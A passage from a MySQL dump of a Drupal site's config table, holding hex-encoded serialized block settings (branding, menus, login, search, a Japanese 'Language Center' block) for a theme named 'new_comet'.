733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.moreannouncement', 0x613a31323a7b733a343a2275756964223b733a33363a2237383638323533362d393330392d343436312d626165632d616631303531356437303832223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a36366266653230302d363734612d343931302d386332322d393939636139343531316139223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31363a226d6f7265616e6e6f756e63656d656e74223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a2266656174757265735f6669727374223b733a363a22776569676874223b693a2d32303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a36366266653230302d363734612d343931302d386332322d393939636139343531316139223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a36366266653230302d363734612d343931302d386332322d393939636139343531316139223b733a353a226c6162656c223b733a31373a224d6f726520616e6e6f756e63656d656e74223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.new_comet_account_menu', 0x613a31333a7b733a343a2275756964223b733a33363a2262373134663962392d343035342d346665342d616166362d633435666132303334343364223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a2273797374656d2e6d656e752e6163636f756e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2256317853636e744b5869472d75462d70673761764b46796478506272333234304145595444397958363730223b7d733a323a226964223b733a32323a226e65775f636f6d65745f6163636f756e745f6d656e75223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31313a226c6561646572626f617264223b733a363a22776569676874223b693a2d31313b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32353a2273797374656d5f6d656e755f626c6f636b3a6163636f756e74223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32353a2273797374656d5f6d656e755f626c6f636b3a6163636f756e74223b733a353a226c6162656c223b733a393a2255736572206d656e75223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a313b733a31363a22657870616e645f616c6c5f6974656d73223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'block.block.new_comet_branding', 0x613a31333a7b733a343a2275756964223b733a33363a2230666133613638332d366463622d343438302d626234612d623965613931306632616539223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22413252356d505552596d44504c74436979724a39485f7345514a586a68696b4e533273796b41424e337951223b7d733a323a226964223b733a31383a226e65775f636f6d65745f6272616e64696e67223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31323a226865616465725f6669727374223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32313a2273797374656d5f6272616e64696e675f626c6f636b223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32313a2273797374656d5f6272616e64696e675f626c6f636b223b733a353a226c6162656c223b733a31333a2253697465206272616e64696e67223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a31333a227573655f736974655f6c6f676f223b623a313b733a31333a227573655f736974655f6e616d65223b623a313b733a31353a227573655f736974655f736c6f67616e223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_breadcrumbs', 0x613a31333a7b733a343a2275756964223b733a33363a2262643366336232312d313736662d343162612d626533372d623061306630663339306433223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224951416731674858777663686148707646466a7667625672327a746777384b545052307847306e35743355223b7d733a323a226964223b733a32313a226e65775f636f6d65745f62726561646372756d6273223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a343a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a313b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.new_comet_content', 0x613a31333a7b733a343a2275756964223b733a33363a2239343737646434332d306535392d343165662d386166312d383763663136653463346431223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e64636257677347726f374632654c49423738784d6c5779504e733458327736367444627275427847786b223b7d733a323a226964223b733a31373a226e65775f636f6d65745f636f6e74656e74223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_footer', 0x613a31333a7b733a343a2275756964223b733a33363a2231633835636439662d393163662d343231612d393166622d633166656666666132323861223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31383a2273797374656d2e6d656e752e666f6f746572223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224468366537456c7153324654574c717873534c75547655547553385a676e6a375659646852697a73424f6f223b7d733a323a226964223b733a31363a226e65775f636f6d65745f666f6f746572223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a363a22666f6f746572223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32343a2273797374656d5f6d656e755f626c6f636b3a666f6f746572223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32343a2273797374656d5f6d656e755f626c6f636b3a666f6f746572223b733a353a226c6162656c223b733a31313a22466f6f746572206d656e75223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a303b733a31363a22657870616e645f616c6c5f6974656d73223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_help', 0x613a31333a7b733a343a2275756964223b733a33363a2230313331333462392d323236662d346137322d616634352d663462653862353433646563223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2268656c70223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22434b6d50473879467136776d4d386d4b744174663342715149577666654d3452714f73766b654c786f5849223b7d733a323a226964223b733a31343a226e65775f636f6d65745f68656c70223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31323b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31303a2268656c705f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31303a2268656c705f626c6f636b223b733a353a226c6162656c223b733a343a2248656c70223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a2268656c70223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_languagecentertitle', 0x613a31323a7b733a343a2275756964223b733a33363a2235633561363663612d666138632d346136302d383466322d343130323133353339346335223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a38616463633336632d363030622d346136342d623435372d646266326561386133346639223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a32393a226e65775f636f6d65745f6c616e677561676563656e7465727469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a38616463633336632d363030622d346136342d623435372d646266326561386133346639223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a38616463633336632d363030622d346136342d623435372d646266326561386133346639223b733a353a226c6162656c223b733a31353a224c616e67756167652043656e746572223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a33363a222f6c616e67756167652d63656e7465720d0a2f6c616e67756167652d63656e7465722f2a223b7d7d7d),
('', 'block.block.new_comet_local_actions', 0x613a31333a7b733a343a2275756964223b733a33363a2264636234663966652d303366382d346664642d626335362d613765633461303730633638223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2234676943676e58377a5453734d6c584d7a3079334c6951645541662d4772777039455931374f7a5373554d223b7d733a323a226964223b733a32333a226e65775f636f6d65745f6c6f63616c5f616374696f6e73223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31313b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_local_tasks', 0x613a31333a7b733a343a2275756964223b733a33363a2262383233356535352d663064362d343836302d626665622d396366616438363562316331223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227a4e4e545974536f437444765f7152784e5033474645344742765643334c78783359495a6e384c59485967223b7d733a323a226964223b733a32313a226e65775f636f6d65745f6c6f63616c5f7461736b73223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31333b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a353a226c6162656c223b733a343a2254616273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b733a373a227072696d617279223b623a313b733a393a227365636f6e64617279223b623a313b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_login', 0x613a31333a7b733a343a2275756964223b733a33363a2263393031376338372d663132312d346330622d386435332d343362333531323639326238223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224e46766d666b5937377935477459307444563767637a764c5234576f5953686c7879476637557655334155223b7d733a323a226964223b733a31353a226e65775f636f6d65745f6c6f67696e223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a32303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31363a22757365725f6c6f67696e5f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31363a22757365725f6c6f67696e5f626c6f636b223b733a353a226c6162656c223b733a31303a2255736572206c6f67696e223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a343a2275736572223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_main_menu', 0x613a31333a7b733a343a2275756964223b733a33363a2233663136653261642d323830612d346565622d616332632d616362323233343538303138223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a2273797374656d2e6d656e752e6d61696e223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2263526f4373466b516a586c54766d466f7869524d63755449684a534f6b793357334d6e365878714445634d223b7d733a323a226964223b733a31393a226e65775f636f6d65745f6d61696e5f6d656e75223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a363a226e6176626172223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32323a2273797374656d5f6d656e755f626c6f636b3a6d61696e223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32323a2273797374656d5f6d656e755f626c6f636b3a6d61696e223b733a353a226c6162656c223b733a393a224d61696e206d656e75223b733a31333a226c6162656c5f646973706c6179223b733a313a2231223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a303b733a31363a22657870616e645f616c6c5f6974656d73223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_messages', 0x613a31333a7b733a343a2275756964223b733a33363a2239303561613764342d666430652d343165392d393531392d346130633461623930313232223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22446474325867304c3136366941614f46326b7a48535450365535444565774d5444695a584d79536f645f6b223b7d733a323a226964223b733a31383a226e65775f636f6d65745f6d65737361676573223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a2d3130303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_morelanguagecenter', 0x613a31323a7b733a343a2275756964223b733a33363a2234323461663263662d643536612d343934352d393763632d653164343532626263353438223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a35376666386464652d663134302d346365612d393364662d303731646462623433393139223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a32383a226e65775f636f6d65745f6d6f72656c616e677561676563656e746572223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a2266656174757265735f6669727374223b733a363a22776569676874223b693a2d31383b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a35376666386464652d663134302d346365612d393364662d303731646462623433393139223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a35376666386464652d663134302d346365612d393364662d303731646462623433393139223b733a353a226c6162656c223b733a32303a224d6f7265204c616e67756167652043656e746572223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.new_comet_page_title', 0x613a31333a7b733a343a2275756964223b733a33363a2235366531386261612d386439642d343066322d393831312d646439393139326533653734223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227464376459463862357569334254553873597843764549695833575659764d5a78495258616733424f5667223b7d733a323a226964223b733a32303a226e65775f636f6d65745f706167655f7469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31363a22706167655f7469746c655f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31363a22706167655f7469746c655f626c6f636b223b733a353a226c6162656c223b733a31303a2250616765207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a343a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a313b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a353a227061676573223b733a32353a222f6e6f64652f2a0d0a2f757365722f2a0d0a3c66726f6e743e223b7d7d7d),
('', 'block.block.new_comet_search', 0x613a31333a7b733a343a2275756964223b733a33363a2238363530643930632d343634612d343033392d393862642d333036633838616436393236223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a22736561726368223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224c4934744c6441595569615f6769424943716f6851745577666c6d5347714f70353361507a454865554777223b7d733a323a226964223b733a31363a226e65775f636f6d65745f736561726368223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a227365617263685f666f726d5f626c6f636b223b733a383a2273657474696e6773223b613a353a7b733a323a226964223b733a31373a227365617263685f666f726d5f626c6f636b223b733a353a226c6162656c223b733a363a22536561726368223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a22736561726368223b733a373a22706167655f6964223b733a303a22223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_tools', 0x613a31333a7b733a343a2275756964223b733a33363a2232383333313539312d646335372d343934362d396137372d353738383763663732613363223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a303b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a2273797374656d2e6d656e752e746f6f6c73223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2249586a796a4d5a573547682d7966634e6750424a525f6f4a4c644c313451542d316c623868327859794c73223b7d733a323a226964223b733a31353a226e65775f636f6d65745f746f6f6c73223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a31303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32333a2273797374656d5f6d656e755f626c6f636b3a746f6f6c73223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32333a2273797374656d5f6d656e755f626c6f636b3a746f6f6c73223b733a353a226c6162656c223b733a353a22546f6f6c73223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a303b733a31363a22657870616e645f616c6c5f6974656d73223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.new_comet_views_block__language_center_block_1', 0x613a31323a7b733a343a2275756964223b733a33363a2230616636646537642d363361342d343931312d383330622d366438333362656135613134223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a32363a2276696577732e766965772e6c616e67756167655f63656e746572223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a34363a226e65775f636f6d65745f76696577735f626c6f636b5f5f6c616e67756167655f63656e7465725f626c6f636b5f31223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a2266656174757265735f6669727374223b733a363a22776569676874223b693a2d31393b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a33353a2276696577735f626c6f636b3a6c616e67756167655f63656e7465722d626c6f636b5f31223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a33353a2276696577735f626c6f636b3a6c616e67756167655f63656e7465722d626c6f636b5f31223b733a353a226c6162656c223b733a31383a22e8aa9ee5ada6e382bbe383b3e382bfe383bc223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31313a2276696577735f6c6162656c223b733a31383a22e8aa9ee5ada6e382bbe383b3e382bfe383bc223b733a31343a226974656d735f7065725f70616765223b733a343a226e6f6e65223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.new_comet_views_block__related_blocks_block_3', 0x613a31323a7b733a343a2275756964223b733a33363a2235396166353037652d393563662d343231302d626534372d376262616465303965666330223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a2276696577732e766965772e72656c617465645f626c6f636b73223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a34353a226e65775f636f6d65745f76696577735f626c6f636b5f5f72656c617465645f626c6f636b735f626c6f636b5f33223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f33223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f33223b733a353a226c6162656c223b733a303a22223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a31313a2276696577735f6c6162656c223b733a303a22223b733a31343a226974656d735f7065725f70616765223b733a343a226e6f6e65223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a31383a222f6c616e67756167652d63656e7465722f2a223b7d7d7d),
('', 'block.block.olivero_account_menu', 